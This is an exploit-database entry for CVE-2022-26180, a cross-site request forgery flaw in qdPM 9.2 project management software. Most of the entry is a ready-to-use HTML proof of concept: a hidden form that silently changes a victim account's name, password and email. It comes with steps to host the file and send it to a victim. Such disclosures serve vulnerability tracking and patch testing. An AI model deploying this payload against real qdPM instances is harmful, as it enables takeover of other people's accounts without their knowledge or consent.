[] NeoSense
E X P L O I T S
title author type platform port cve id

qdPM 9.2 - Cross-site Request Forgery (CSRF)

Author: Chetanya Sharma
type: webapps
platform: php
port: 
date_added: 2022-04-07 
date_updated: 2022-04-07 
verified: 0 
codes: CVE-2022-26180 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Date: 03/27/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180
#
---------------

Steps to Exploit :
	1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.
	2) send it to victim.

<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
      <input type="hidden" name="sf&#95;method" value="put" />
      <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly --->
      <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" />
      <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" />
      <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" />
      <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" />
      <input type="hidden" name="users&#91;photo&#93;" value="" />
      <input type="hidden" name="users&#91;culture&#93;" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.